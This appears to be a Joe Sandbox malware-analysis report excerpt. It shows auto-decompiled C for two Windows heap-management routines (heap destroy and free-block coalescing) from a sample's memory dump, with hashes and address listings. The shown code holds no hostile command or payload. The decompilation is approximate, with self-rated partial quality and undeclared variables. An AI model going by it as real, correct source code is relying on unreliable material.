                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                        • API String ID: 2994545307-336120773
                                                        • Opcode ID: 7662567e7a9c4da62e9964cc1bab27f276dab18df28177c4f27f3e59b82e957e
                                                        • Instruction ID: 8729698c33a255e0733c943f506cd3df090ccf6e445b0e1a04e5e908653449c4
                                                        • Opcode Fuzzy Hash: 7662567e7a9c4da62e9964cc1bab27f276dab18df28177c4f27f3e59b82e957e
                                                        • Instruction Fuzzy Hash: 6E31F331101115EFEB21DB5DC899F6AB7E8EF04B24F5C405DF505CB251E6B4FA40CA59
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 018A3518 Relevance: 5.1, Strings: 4, Instructions: 55COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 66%
                                                        			E018A3518(signed int* __ecx) {
				char _v8;
				void* _t11;
				signed int* _t34;

				_push(__ecx);
				_t34 = __ecx;
				if(__ecx !=  *((intOrPtr*)( *[fs:0x30] + 0x18))) {
					if(E017E40E1("RtlDestroyHeap") == 0 || E018A4496(__ecx, 0) == 0) {
						goto L5;
					} else {
						_t32 = __ecx + 0x80;
						 *((intOrPtr*)(__ecx + 0x60)) = 0;
						if( *((intOrPtr*)(__ecx + 0x80)) != 0) {
							_v8 = 0;
							E0181174B(_t32,  &_v8, 0x8000);
						}
						_t11 = 1;
					}
				} else {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E017EB150();
					} else {
						E017EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E017EB150("May not destroy the process heap at %p\n", _t34);
					L5:
					_t11 = 0;
				}
				return _t11;
			}






                                                        0x018a351d
                                                        0x018a3525
                                                        0x018a352a
                                                        0x018a357d
                                                        0x00000000
                                                        0x018a358c
                                                        0x018a358e
                                                        0x018a3594
                                                        0x018a3599
                                                        0x018a359b
                                                        0x018a35a7
                                                        0x018a35a7
                                                        0x018a35ac
                                                        0x018a35ac
                                                        0x018a352c
                                                        0x018a3536
                                                        0x018a3555
                                                        0x018a355a
                                                        0x018a3538
                                                        0x018a354d
                                                        0x018a3552
                                                        0x018a3566
                                                        0x018a356d
                                                        0x018a356d
                                                        0x018a356d
                                                        0x018a35b2

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: HEAP: $HEAP[%wZ]: $May not destroy the process heap at %p$RtlDestroyHeap
                                                        • API String ID: 0-4256168463
                                                        • Opcode ID: 227f102b194a901efcc73ef50d486072df489fa60fe3965d4463d63e27b20528
                                                        • Instruction ID: 8dea966b8ff43ef5d0711a1014d0693dd2f8d9564a02ba97085fd534ba8cb97f
                                                        • Opcode Fuzzy Hash: 227f102b194a901efcc73ef50d486072df489fa60fe3965d4463d63e27b20528
                                                        • Instruction Fuzzy Hash: 430145321116059FEB21EB6D848CBAAB7E8FB45B20F04845EF886DB345DA70EB40CA51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 018099BF Relevance: 4.3, Strings: 3, Instructions: 572COMMONCrypto
                                                        Download Yara Rule
                                                        C-Code - Quality: 78%
                                                        			E018099BF(signed int __ecx, signed short* __edx, signed int* _a4, signed int _a8) {
				char _v5;
				signed int _v12;
				signed int _v16;
				signed short _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed short _t186;
				intOrPtr _t187;
				signed short _t190;
				signed int _t196;
				signed short _t197;
				intOrPtr _t203;
				signed int _t207;
				signed int _t210;
				signed short _t215;
				intOrPtr _t216;
				signed short _t219;
				signed int _t221;
				signed short _t222;
				intOrPtr _t228;
				signed int _t232;
				signed int _t235;
				signed int _t250;
				signed short _t251;
				intOrPtr _t252;
				signed short _t254;
				intOrPtr _t255;
				signed int _t258;
				signed int _t259;
				signed short _t262;
				intOrPtr _t271;
				signed int _t279;
				signed int _t282;
				signed int _t284;
				signed int _t286;
				intOrPtr _t292;
				signed int _t296;
				signed int _t299;
				signed int _t307;
				signed int* _t309;
				signed short* _t311;
				signed short* _t313;
				signed char _t314;
				intOrPtr _t316;
				signed int _t323;
				signed char _t328;
				signed short* _t330;
				signed char _t331;
				intOrPtr _t335;
				signed int _t342;
				signed char _t347;
				signed short* _t348;
				signed short* _t350;
				signed short _t352;
				signed char _t354;
				intOrPtr _t357;
				intOrPtr* _t364;
				signed char _t365;
				intOrPtr _t366;
				signed int _t373;
				signed char _t378;
				signed int* _t381;
				signed int _t382;
				signed short _t384;
				signed int _t386;
				unsigned int _t390;
				signed int _t393;
				signed int* _t394;
				unsigned int _t398;
				signed short _t400;
				signed short _t402;
				signed int _t404;
				signed int _t407;
				unsigned int _t411;
				signed short* _t414;
				signed int _t415;
				signed short* _t419;
				signed int* _t420;
				void* _t421;

				_t414 = __edx;
				_t307 = __ecx;
				_t419 = __edx - (( *(__edx + 4) & 0x0000ffff ^  *(__ecx + 0x54) & 0x0000ffff) << 3);
				if(_t419 == __edx || (( *(__ecx + 0x4c) >> 0x00000014 &  *(__ecx + 0x52) ^ _t419[1]) & 0x00000001) != 0) {
					_v5 = _a8;
					L3:
					_t381 = _a4;
					goto L4;
				} else {
					__eflags =  *(__ecx + 0x4c);
					if( *(__ecx + 0x4c) != 0) {
						_t411 =  *(__ecx + 0x50) ^  *_t419;
						 *_t419 = _t411;
						_t378 = _t411 >> 0x00000010 ^ _t411 >> 0x00000008 ^ _t411;
						__eflags = _t411 >> 0x18 - _t378;
						if(__eflags != 0) {
							_push(_t378);
							E0189FA2B(__ecx, __ecx, _t419, __edx, _t419, __eflags);
						}
					}
					_t250 = _a8;
					_v5 = _t250;
					__eflags = _t250;
					if(_t250 != 0) {
						_t400 = _t414[6];
						_t53 =  &(_t414[4]); // -16
						_t348 = _t53;
						_t251 =  *_t348;
						_v12 = _t251;
						_v16 = _t400;
						_t252 =  *((intOrPtr*)(_t251 + 4));
						__eflags =  *_t400 - _t252;
						if( *_t400 != _t252) {
							L49:
							_push(_t348);
							_push( *_t400);
							E018AA80D(_t307, 0xd, _t348, _t252);
							L50:
							_v5 = 0;
							goto L11;
						}
						__eflags =  *_t400 - _t348;
						if( *_t400 != _t348) {
							goto L49;
						}
						 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
						_t407 =  *(_t307 + 0xb4);
						__eflags = _t407;
						if(_t407 == 0) {
							L36:
							_t364 = _v16;
							_t282 = _v12;
							 *_t364 = _t282;
							 *((intOrPtr*)(_t282 + 4)) = _t364;
							__eflags = _t414[1] & 0x00000008;
							if((_t414[1] & 0x00000008) == 0) {
								L39:
								_t365 = _t414[1];
								__eflags = _t365 & 0x00000004;
								if((_t365 & 0x00000004) != 0) {
									_t284 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
									_v12 = _t284;
									__eflags = _t365 & 0x00000002;
									if((_t365 & 0x00000002) != 0) {
										__eflags = _t284 - 4;
										if(_t284 > 4) {
											_t284 = _t284 - 4;
											__eflags = _t284;
											_v12 = _t284;
										}
									}
									_t78 =  &(_t414[8]); // -8
									_t286 = E0183D540(_t78, _t284, 0xfeeefeee);
									_v16 = _t286;
									__eflags = _t286 - _v12;
									if(_t286 != _v12) {
										_t366 =  *[fs:0x30];
										__eflags =  *(_t366 + 0xc);
										if( *(_t366 + 0xc) == 0) {
											_push("HEAP: ");
											E017EB150();
										} else {
											E017EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push(_v16 + 0x10 + _t414);
										E017EB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
										_t292 =  *[fs:0x30];
										_t421 = _t421 + 0xc;
										__eflags =  *((char*)(_t292 + 2));
										if( *((char*)(_t292 + 2)) != 0) {
											 *0x18d6378 = 1;
											asm("int3");
											 *0x18d6378 = 0;
										}
									}
								}
								goto L50;
							}
							_t296 = E0180A229(_t307, _t414);
							__eflags = _t296;
							if(_t296 != 0) {
								goto L39;
							} else {
								E0180A309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
								goto L50;
							}
						} else {
							_t373 =  *_t414 & 0x0000ffff;
							while(1) {
								__eflags = _t373 -  *((intOrPtr*)(_t407 + 4));
								if(_t373 <  *((intOrPtr*)(_t407 + 4))) {
									_t301 = _t373;
									break;
								}
								_t299 =  *_t407;
								__eflags = _t299;
								if(_t299 == 0) {
									_t301 =  *((intOrPtr*)(_t407 + 4)) - 1;
									__eflags =  *((intOrPtr*)(_t407 + 4)) - 1;
									break;
								} else {
									_t407 = _t299;
									continue;
								}
							}
							_t62 =  &(_t414[4]); // -16
							E0180BC04(_t307, _t407, 1, _t62, _t301, _t373);
							goto L36;
						}
					}
					L11:
					_t402 = _t419[6];
					_t25 =  &(_t419[4]); // -16
					_t350 = _t25;
					_t254 =  *_t350;
					_v12 = _t254;
					_v20 = _t402;
					_t255 =  *((intOrPtr*)(_t254 + 4));
					__eflags =  *_t402 - _t255;
					if( *_t402 != _t255) {
						L61:
						_push(_t350);
						_push( *_t402);
						E018AA80D(_t307, 0xd, _t350, _t255);
						goto L3;
					}
					__eflags =  *_t402 - _t350;
					if( *_t402 != _t350) {
						goto L61;
					}
					 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t419 & 0x0000ffff);
					_t404 =  *(_t307 + 0xb4);
					__eflags = _t404;
					if(_t404 == 0) {
						L20:
						_t352 = _v20;
						_t258 = _v12;
						 *_t352 = _t258;
						 *(_t258 + 4) = _t352;
						__eflags = _t419[1] & 0x00000008;
						if((_t419[1] & 0x00000008) != 0) {
							_t259 = E0180A229(_t307, _t419);
							__eflags = _t259;
							if(_t259 != 0) {
								goto L21;
							} else {
								E0180A309(_t307, _t419,  *_t419 & 0x0000ffff, 1);
								goto L3;
							}
						}
						L21:
						_t354 = _t419[1];
						__eflags = _t354 & 0x00000004;
						if((_t354 & 0x00000004) != 0) {
							_t415 = ( *_t419 & 0x0000ffff) * 8 - 0x10;
							__eflags = _t354 & 0x00000002;
							if((_t354 & 0x00000002) != 0) {
								__eflags = _t415 - 4;
								if(_t415 > 4) {
									_t415 = _t415 - 4;
									__eflags = _t415;
								}
							}
							_t91 =  &(_t419[8]); // -8
							_t262 = E0183D540(_t91, _t415, 0xfeeefeee);
							_v20 = _t262;
							__eflags = _t262 - _t415;
							if(_t262 != _t415) {
								_t357 =  *[fs:0x30];
								__eflags =  *(_t357 + 0xc);
								if( *(_t357 + 0xc) == 0) {
									_push("HEAP: ");
									E017EB150();
								} else {
									E017EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(_v20 + 0x10 + _t419);
								E017EB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t419);
								_t271 =  *[fs:0x30];
								_t421 = _t421 + 0xc;
								__eflags =  *((char*)(_t271 + 2));
								if( *((char*)(_t271 + 2)) != 0) {
									 *0x18d6378 = 1;
									asm("int3");
									 *0x18d6378 = 0;
								}
							}
						}
						_t381 = _a4;
						_t414 = _t419;
						_t419[1] = 0;
						_t419[3] = 0;
						 *_t381 =  *_t381 + ( *_t419 & 0x0000ffff);
						 *_t419 =  *_t381;
						 *(_t419 + 4 +  *_t381 * 8) =  *_t381 ^  *(_t307 + 0x54);
						L4:
						_t420 = _t414 +  *_t381 * 8;
						if( *(_t307 + 0x4c) == 0) {
							L6:
							while((( *(_t307 + 0x4c) >> 0x00000014 &  *(_t307 + 0x52) ^ _t420[0]) & 0x00000001) == 0) {
								__eflags =  *(_t307 + 0x4c);
								if( *(_t307 + 0x4c) != 0) {
									_t390 =  *(_t307 + 0x50) ^  *_t420;
									 *_t420 = _t390;
									_t328 = _t390 >> 0x00000010 ^ _t390 >> 0x00000008 ^ _t390;
									__eflags = _t390 >> 0x18 - _t328;
									if(__eflags != 0) {
										_push(_t328);
										E0189FA2B(_t307, _t307, _t420, _t414, _t420, __eflags);
									}
								}
								__eflags = _v5;
								if(_v5 == 0) {
									L94:
									_t382 = _t420[3];
									_t137 =  &(_t420[2]); // -16
									_t309 = _t137;
									_t186 =  *_t309;
									_v20 = _t186;
									_v16 = _t382;
									_t187 =  *((intOrPtr*)(_t186 + 4));
									__eflags =  *_t382 - _t187;
									if( *_t382 != _t187) {
										L63:
										_push(_t309);
										_push( *_t382);
										_push(_t187);
										_push(_t309);
										_push(0xd);
										L64:
										E018AA80D(_t307);
										continue;
									}
									__eflags =  *_t382 - _t309;
									if( *_t382 != _t309) {
										goto L63;
									}
									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t420 & 0x0000ffff);
									_t393 =  *(_t307 + 0xb4);
									__eflags = _t393;
									if(_t393 == 0) {
										L104:
										_t330 = _v16;
										_t190 = _v20;
										 *_t330 = _t190;
										 *(_t190 + 4) = _t330;
										__eflags = _t420[0] & 0x00000008;
										if((_t420[0] & 0x00000008) == 0) {
											L107:
											_t331 = _t420[0];
											__eflags = _t331 & 0x00000004;
											if((_t331 & 0x00000004) != 0) {
												_t196 = ( *_t420 & 0x0000ffff) * 8 - 0x10;
												_v12 = _t196;
												__eflags = _t331 & 0x00000002;
												if((_t331 & 0x00000002) != 0) {
													__eflags = _t196 - 4;
													if(_t196 > 4) {
														_t196 = _t196 - 4;
														__eflags = _t196;
														_v12 = _t196;
													}
												}
												_t162 =  &(_t420[4]); // -8
												_t197 = E0183D540(_t162, _t196, 0xfeeefeee);
												_v20 = _t197;
												__eflags = _t197 - _v12;
												if(_t197 != _v12) {
													_t335 =  *[fs:0x30];
													__eflags =  *(_t335 + 0xc);
													if( *(_t335 + 0xc) == 0) {
														_push("HEAP: ");
														E017EB150();
													} else {
														E017EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
													}
													_push(_v20 + 0x10 + _t420);
													E017EB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t420);
													_t203 =  *[fs:0x30];
													__eflags =  *((char*)(_t203 + 2));
													if( *((char*)(_t203 + 2)) != 0) {
														 *0x18d6378 = 1;
														asm("int3");
														 *0x18d6378 = 0;
													}
												}
											}
											_t394 = _a4;
											_t414[1] = 0;
											_t414[3] = 0;
											 *_t394 =  *_t394 + ( *_t420 & 0x0000ffff);
											 *_t414 =  *_t394;
											 *(_t414 + 4 +  *_t394 * 8) =  *_t394 ^  *(_t307 + 0x54);
											break;
										}
										_t207 = E0180A229(_t307, _t420);
										__eflags = _t207;
										if(_t207 != 0) {
											goto L107;
										}
										E0180A309(_t307, _t420,  *_t420 & 0x0000ffff, 1);
										continue;
									}
									_t342 =  *_t420 & 0x0000ffff;
									while(1) {
										__eflags = _t342 -  *((intOrPtr*)(_t393 + 4));
										if(_t342 <  *((intOrPtr*)(_t393 + 4))) {
											break;
										}
										_t210 =  *_t393;
										__eflags = _t210;
										if(_t210 == 0) {
											_t212 =  *((intOrPtr*)(_t393 + 4)) - 1;
											__eflags =  *((intOrPtr*)(_t393 + 4)) - 1;
											L103:
											_t146 =  &(_t420[2]); // -16
											E0180BC04(_t307, _t393, 1, _t146, _t212, _t342);
											goto L104;
										}
										_t393 = _t210;
									}
									_t212 = _t342;
									goto L103;
								} else {
									_t384 = _t414[6];
									_t102 =  &(_t414[4]); // -16
									_t311 = _t102;
									_t215 =  *_t311;
									_v20 = _t215;
									_v16 = _t384;
									_t216 =  *((intOrPtr*)(_t215 + 4));
									__eflags =  *_t384 - _t216;
									if( *_t384 != _t216) {
										L92:
										_push(_t311);
										_push( *_t384);
										E018AA80D(_t307, 0xd, _t311, _t216);
										L93:
										_v5 = 0;
										goto L94;
									}
									__eflags =  *_t384 - _t311;
									if( *_t384 != _t311) {
										goto L92;
									}
									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
									_t386 =  *(_t307 + 0xb4);
									__eflags = _t386;
									if(_t386 == 0) {
										L79:
										_t313 = _v16;
										_t219 = _v20;
										 *_t313 = _t219;
										 *(_t219 + 4) = _t313;
										__eflags = _t414[1] & 0x00000008;
										if((_t414[1] & 0x00000008) == 0) {
											L82:
											_t314 = _t414[1];
											__eflags = _t314 & 0x00000004;
											if((_t314 & 0x00000004) != 0) {
												_t221 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
												_v12 = _t221;
												__eflags = _t314 & 0x00000002;
												if((_t314 & 0x00000002) != 0) {
													__eflags = _t221 - 4;
													if(_t221 > 4) {
														_t221 = _t221 - 4;
														__eflags = _t221;
														_v12 = _t221;
													}
												}
												_t127 =  &(_t414[8]); // -8
												_t222 = E0183D540(_t127, _t221, 0xfeeefeee);
												_v20 = _t222;
												__eflags = _t222 - _v12;
												if(_t222 != _v12) {
													_t316 =  *[fs:0x30];
													__eflags =  *(_t316 + 0xc);
													if( *(_t316 + 0xc) == 0) {
														_push("HEAP: ");
														E017EB150();
													} else {
														E017EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
													}
													_push(_v20 + 0x10 + _t414);
													E017EB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
													_t228 =  *[fs:0x30];
													_t421 = _t421 + 0xc;
													__eflags =  *((char*)(_t228 + 2));
													if( *((char*)(_t228 + 2)) != 0) {
														 *0x18d6378 = 1;
														asm("int3");
														 *0x18d6378 = 0;
													}
												}
											}
											goto L93;
										}
										_t232 = E0180A229(_t307, _t414);
										__eflags = _t232;
										if(_t232 != 0) {
											goto L82;
										}
										E0180A309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
										goto L93;
									}
									_t323 =  *_t414 & 0x0000ffff;
									while(1) {
										__eflags = _t323 -  *((intOrPtr*)(_t386 + 4));
										if(_t323 <  *((intOrPtr*)(_t386 + 4))) {
											break;
										}
										_t235 =  *_t386;
										__eflags = _t235;
										if(_t235 == 0) {
											_t237 =  *((intOrPtr*)(_t386 + 4)) - 1;
											__eflags =  *((intOrPtr*)(_t386 + 4)) - 1;
											L78:
											_t111 =  &(_t414[4]); // -16
											E0180BC04(_t307, _t386, 1, _t111, _t237, _t323);
											goto L79;
										}
										_t386 = _t235;
									}
									_t237 = _t323;
									goto L78;
								}
							}
							return _t414;
						}
						_t398 =  *(_t307 + 0x50) ^  *_t420;
						_t347 = _t398 >> 0x00000010 ^ _t398 >> 0x00000008 ^ _t398;
						if(_t398 >> 0x18 != _t347) {
							_push(_t347);
							_push(0);
							_push(0);
							_push(_t420);
							_push(3);
							goto L64;
						}
						goto L6;
					} else {
						_t277 =  *_t419 & 0x0000ffff;
						_v16 = _t277;
						while(1) {
							__eflags = _t277 -  *((intOrPtr*)(_t404 + 4));
							if(_t277 <  *((intOrPtr*)(_t404 + 4))) {
								break;
							}
							_t279 =  *_t404;
							__eflags = _t279;
							if(_t279 == 0) {
								_t277 =  *((intOrPtr*)(_t404 + 4)) - 1;
								__eflags =  *((intOrPtr*)(_t404 + 4)) - 1;
								break;
							} else {
								_t404 = _t279;
								_t277 =  *_t419 & 0x0000ffff;
								continue;
							}
						}
						E0180BC04(_t307, _t404, 1, _t350, _t277, _v16);
						goto L20;
					}
				}
			}




















































































                                                        0x018099ca
                                                        0x018099cc
                                                        0x018099df
                                                        0x018099e3
                                                        0x018099f8
                                                        0x018099fb
                                                        0x018099fb
                                                        0x00000000
                                                        0x01809a48
                                                        0x01809a48
                                                        0x01809a4c
                                                        0x01809a51
                                                        0x01809a55
                                                        0x01809a61
                                                        0x01809a66
                                                        0x01809a68
                                                        0x01851457
                                                        0x0185145c
                                                        0x0185145c
                                                        0x01809a68
                                                        0x01809a6e
                                                        0x01809a71
                                                        0x01809a74
                                                        0x01809a76
                                                        0x01851466
                                                        0x01851469
                                                        0x01851469
                                                        0x0185146c
                                                        0x0185146e
                                                        0x01851471
                                                        0x01851474
                                                        0x01851477
                                                        0x01851479
                                                        0x0185159c
                                                        0x0185159c
                                                        0x0185159d
                                                        0x018515a6
                                                        0x018515ab
                                                        0x018515ab
                                                        0x00000000
                                                        0x018515ab
                                                        0x0185147f
                                                        0x01851481
                                                        0x00000000
                                                        0x00000000
                                                        0x0185148a
                                                        0x0185148d
                                                        0x01851493
                                                        0x01851495
                                                        0x018514c0
                                                        0x018514c0
                                                        0x018514c3
                                                        0x018514c6
                                                        0x018514c8
                                                        0x018514cb
                                                        0x018514cf
                                                        0x018514f2
                                                        0x018514f2
                                                        0x018514f5
                                                        0x018514f8
                                                        0x01851501
                                                        0x01851508
                                                        0x0185150b
                                                        0x0185150e
                                                        0x01851510
                                                        0x01851513
                                                        0x01851515
                                                        0x01851515
                                                        0x01851518
                                                        0x01851518
                                                        0x01851513
                                                        0x01851521
                                                        0x01851525
                                                        0x0185152a
                                                        0x0185152d
                                                        0x01851530
                                                        0x01851532
                                                        0x01851539
                                                        0x0185153d
                                                        0x0185155d
                                                        0x01851562
                                                        0x0185153f
                                                        0x01851555
                                                        0x0185155a
                                                        0x01851570
                                                        0x01851577
                                                        0x0185157c
                                                        0x01851582
                                                        0x01851585
                                                        0x01851589
                                                        0x0185158b
                                                        0x01851592
                                                        0x01851593
                                                        0x01851593
                                                        0x01851589
                                                        0x01851530
                                                        0x00000000
                                                        0x018514f8
                                                        0x018514d5
                                                        0x018514da
                                                        0x018514dc
                                                        0x00000000
                                                        0x018514de
                                                        0x018514e8
                                                        0x00000000
                                                        0x018514e8
                                                        0x01851497
                                                        0x01851497
                                                        0x018514a4
                                                        0x018514a4
                                                        0x018514a7
                                                        0x018514a9
                                                        0x018514ab
                                                        0x018514ab
                                                        0x0185149c
                                                        0x0185149e
                                                        0x018514a0
                                                        0x018514b0
                                                        0x018514b0
                                                        0x00000000
                                                        0x018514a2
                                                        0x018514a2
                                                        0x00000000
                                                        0x018514a2
                                                        0x018514a0
                                                        0x018514b3
                                                        0x018514bb
                                                        0x00000000
                                                        0x018514bb
                                                        0x01851495
                                                        0x01809a7c
                                                        0x01809a7c
                                                        0x01809a7f
                                                        0x01809a7f
                                                        0x01809a82
                                                        0x01809a84
                                                        0x01809a87
                                                        0x01809a8a
                                                        0x01809a8d
                                                        0x01809a8f
                                                        0x0185166a
                                                        0x0185166a
                                                        0x0185166b
                                                        0x01851674
                                                        0x00000000
                                                        0x01851674
                                                        0x01809a95
                                                        0x01809a97
                                                        0x00000000
                                                        0x00000000
                                                        0x01809aa0
                                                        0x01809aa3
                                                        0x01809aa9
                                                        0x01809aab
                                                        0x01809ad7
                                                        0x01809ad7
                                                        0x01809ada
                                                        0x01809add
                                                        0x01809adf
                                                        0x01809ae2
                                                        0x01809ae6
                                                        0x01809b22
                                                        0x01809b27
                                                        0x01809b29
                                                        0x00000000
                                                        0x01809b2b
                                                        0x018515be
                                                        0x00000000
                                                        0x018515be
                                                        0x01809b29
                                                        0x01809ae8
                                                        0x01809ae8
                                                        0x01809aeb
                                                        0x01809aee
                                                        0x018515cb
                                                        0x018515d2
                                                        0x018515d5
                                                        0x018515d7
                                                        0x018515da
                                                        0x018515dc
                                                        0x018515dc
                                                        0x018515dc
                                                        0x018515da
                                                        0x018515e5
                                                        0x018515e9
                                                        0x018515ee
                                                        0x018515f1
                                                        0x018515f3
                                                        0x018515f9
                                                        0x01851600
                                                        0x01851604
                                                        0x01851624
                                                        0x01851629
                                                        0x01851606
                                                        0x0185161c
                                                        0x01851621
                                                        0x01851637
                                                        0x0185163e
                                                        0x01851643
                                                        0x01851649
                                                        0x0185164c
                                                        0x01851650
                                                        0x01851656
                                                        0x0185165d
                                                        0x0185165e
                                                        0x0185165e
                                                        0x01851650
                                                        0x018515f3
                                                        0x01809af4
                                                        0x01809af7
                                                        0x01809afc
                                                        0x01809b00
                                                        0x01809b04
                                                        0x01809b08
                                                        0x01809b14
                                                        0x018099fe
                                                        0x01809a04
                                                        0x01809a07
                                                        0x00000000
                                                        0x01809a29
                                                        0x0185169c
                                                        0x018516a0
                                                        0x018516a5
                                                        0x018516a9
                                                        0x018516b5
                                                        0x018516ba
                                                        0x018516bc
                                                        0x018516be
                                                        0x018516c3
                                                        0x018516c3
                                                        0x018516bc
                                                        0x018516c8
                                                        0x018516cc
                                                        0x0185181b
                                                        0x0185181b
                                                        0x0185181e
                                                        0x0185181e
                                                        0x01851821
                                                        0x01851823
                                                        0x01851826
                                                        0x01851829
                                                        0x0185182c
                                                        0x0185182e
                                                        0x01851688
                                                        0x01851688
                                                        0x01851689
                                                        0x0185168b
                                                        0x0185168c
                                                        0x0185168d
                                                        0x0185168f
                                                        0x01851692
                                                        0x00000000
                                                        0x01851692
                                                        0x01851834
                                                        0x01851836
                                                        0x00000000
                                                        0x00000000
                                                        0x0185183f
                                                        0x01851842
                                                        0x01851848
                                                        0x0185184a
                                                        0x01851875
                                                        0x01851875
                                                        0x01851878
                                                        0x0185187b
                                                        0x0185187d
                                                        0x01851880
                                                        0x01851884
                                                        0x018518a7
                                                        0x018518a7
                                                        0x018518aa
                                                        0x018518ad
                                                        0x018518b6
                                                        0x018518bd
                                                        0x018518c0
                                                        0x018518c3
                                                        0x018518c5
                                                        0x018518c8
                                                        0x018518ca
                                                        0x018518ca
                                                        0x018518cd
                                                        0x018518cd
                                                        0x018518c8
                                                        0x018518d5
                                                        0x018518da
                                                        0x018518df
                                                        0x018518e2
                                                        0x018518e5
                                                        0x018518e7
                                                        0x018518ee
                                                        0x018518f2
                                                        0x01851912
                                                        0x01851917
                                                        0x018518f4
                                                        0x0185190a
                                                        0x0185190f
                                                        0x01851925
                                                        0x0185192c
                                                        0x01851931
                                                        0x0185193a
                                                        0x0185193e
                                                        0x01851940
                                                        0x01851947
                                                        0x01851948
                                                        0x01851948
                                                        0x0185193e
                                                        0x018518e5
                                                        0x0185194f
                                                        0x01851952
                                                        0x01851956
                                                        0x0185195d
                                                        0x01851961
                                                        0x0185196d
                                                        0x00000000
                                                        0x0185196d
                                                        0x0185188a
                                                        0x0185188f
                                                        0x01851891
                                                        0x00000000
                                                        0x00000000
                                                        0x0185189d
                                                        0x00000000
                                                        0x0185189d
                                                        0x0185184c
                                                        0x01851859
                                                        0x01851859
                                                        0x0185185c
                                                        0x00000000
                                                        0x00000000
                                                        0x01851851
                                                        0x01851853
                                                        0x01851855
                                                        0x01851865
                                                        0x01851865
                                                        0x01851866
                                                        0x01851868
                                                        0x01851870
                                                        0x00000000
                                                        0x01851870
                                                        0x01851857
                                                        0x01851857
                                                        0x0185185e
                                                        0x00000000
                                                        0x018516d2
                                                        0x018516d2
                                                        0x018516d5
                                                        0x018516d5
                                                        0x018516d8
                                                        0x018516da
                                                        0x018516dd
                                                        0x018516e0
                                                        0x018516e3
                                                        0x018516e5
                                                        0x01851808
                                                        0x01851808
                                                        0x01851809
                                                        0x01851812
                                                        0x01851817
                                                        0x01851817
                                                        0x00000000
                                                        0x01851817
                                                        0x018516eb
                                                        0x018516ed
                                                        0x00000000
                                                        0x00000000
                                                        0x018516f6
                                                        0x018516f9
                                                        0x018516ff
                                                        0x01851701
                                                        0x0185172c
                                                        0x0185172c
                                                        0x0185172f
                                                        0x01851732
                                                        0x01851734
                                                        0x01851737
                                                        0x0185173b
                                                        0x0185175e
                                                        0x0185175e
                                                        0x01851761
                                                        0x01851764
                                                        0x0185176d
                                                        0x01851774
                                                        0x01851777
                                                        0x0185177a
                                                        0x0185177c
                                                        0x0185177f
                                                        0x01851781
                                                        0x01851781
                                                        0x01851784
                                                        0x01851784
                                                        0x0185177f
                                                        0x0185178c
                                                        0x01851791
                                                        0x01851796
                                                        0x01851799
                                                        0x0185179c
                                                        0x0185179e
                                                        0x018517a5
                                                        0x018517a9
                                                        0x018517c9
                                                        0x018517ce
                                                        0x018517ab
                                                        0x018517c1
                                                        0x018517c6
                                                        0x018517dc
                                                        0x018517e3
                                                        0x018517e8
                                                        0x018517ee
                                                        0x018517f1
                                                        0x018517f5
                                                        0x018517f7
                                                        0x018517fe
                                                        0x018517ff
                                                        0x018517ff
                                                        0x018517f5
                                                        0x0185179c
                                                        0x00000000
                                                        0x01851764
                                                        0x01851741
                                                        0x01851746
                                                        0x01851748
                                                        0x00000000
                                                        0x00000000
                                                        0x01851754
                                                        0x00000000
                                                        0x01851754
                                                        0x01851703
                                                        0x01851710
                                                        0x01851710
                                                        0x01851713
                                                        0x00000000
                                                        0x00000000
                                                        0x01851708
                                                        0x0185170a
                                                        0x0185170c
                                                        0x0185171c
                                                        0x0185171c
                                                        0x0185171d
                                                        0x0185171f
                                                        0x01851727
                                                        0x00000000
                                                        0x01851727
                                                        0x0185170e
                                                        0x0185170e
                                                        0x01851715
                                                        0x00000000
                                                        0x01851715
                                                        0x018516cc
                                                        0x01809a45
                                                        0x01809a45
                                                        0x01809a0e
                                                        0x01809a1c
                                                        0x01809a23
                                                        0x0185167e
                                                        0x0185167f
                                                        0x01851681
                                                        0x01851683
                                                        0x01851684
                                                        0x00000000
                                                        0x01851684
                                                        0x00000000
                                                        0x01809aad
                                                        0x01809aad
                                                        0x01809ab0
                                                        0x01809ab3
                                                        0x01809ab3
                                                        0x01809ab6
                                                        0x00000000
